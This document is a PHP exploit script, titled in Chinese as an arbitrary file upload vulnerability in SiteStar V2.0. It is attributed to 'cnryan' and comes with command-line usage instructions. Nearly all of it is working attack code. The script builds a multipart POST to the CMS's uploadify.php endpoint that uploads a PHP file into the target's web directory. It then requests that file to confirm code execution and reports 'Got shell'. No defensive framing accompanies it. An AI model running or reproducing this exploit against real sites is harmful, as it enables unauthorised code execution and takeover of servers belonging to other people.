SiteStar V2.0 任意文件上传漏洞

                                                <?
print_r('
+---------------------------------------------------------------------------+
SiteStar V2.0 Remote Shell Upload Exploit
by cnryan
Mail: cnryan2008[at]gmail[dot]com
Blog: http://hi.baidu.com/cnryan    
+---------------------------------------------------------------------------+
');
if ($argc < 3)
{ 
    print "\nUsage: php $argv[0] host path\n"; 
    print "Example: php $argv[0] localhost /sitestar/\n";   
    die(); 
}
error_reporting(0); 
set_time_limit(0); 
$host = $argv[1];
$path = $argv[2];
$shell = 'http://'.$host.$path.'cnryan.php';
    $payload  = "-----cnryan\r\n";
    $payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"cnryan.php\"\r\n";
    $payload .= "Content-Type: application/octet-stream\r\n\r\n";
    $payload .= "<?php phpinfo();?>W.S.T\r\n-----cnryan\r\n";
    $payload .= "Content-Disposition: form-data; name=\"upload\"\r\n\r\n\r\n";
    $payload .= "-----cnryan\r\n";
    $payload .= "Content-Disposition: form-data; name=\"folder\"\r\n\r\n";
    $payload .= "$path\r\n";
    $payload .= "-----cnryan--";      
    $packet  = "POST {$path}/script/multiupload/uploadify.php HTTP/1.0\r\n"; 
    $packet .= "Host: {$host}\r\n";  
    $packet .= "Connection: keep-alive\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary=---cnryan\r\n"; 
    $packet .= "Content-Length: ".strlen($payload)."\r\n\r\n"; 
    $packet .= $payload; 
$fp = fsockopen($host, 80);
    fputs($fp, $packet);

   sleep(5);
   $str=file_get_contents($shell);
if(strpos($str,'W.S.T')) 
    exit("OK! Got shell:\t$shell\n");
else
    exit("Exploit Failed!\n");
?>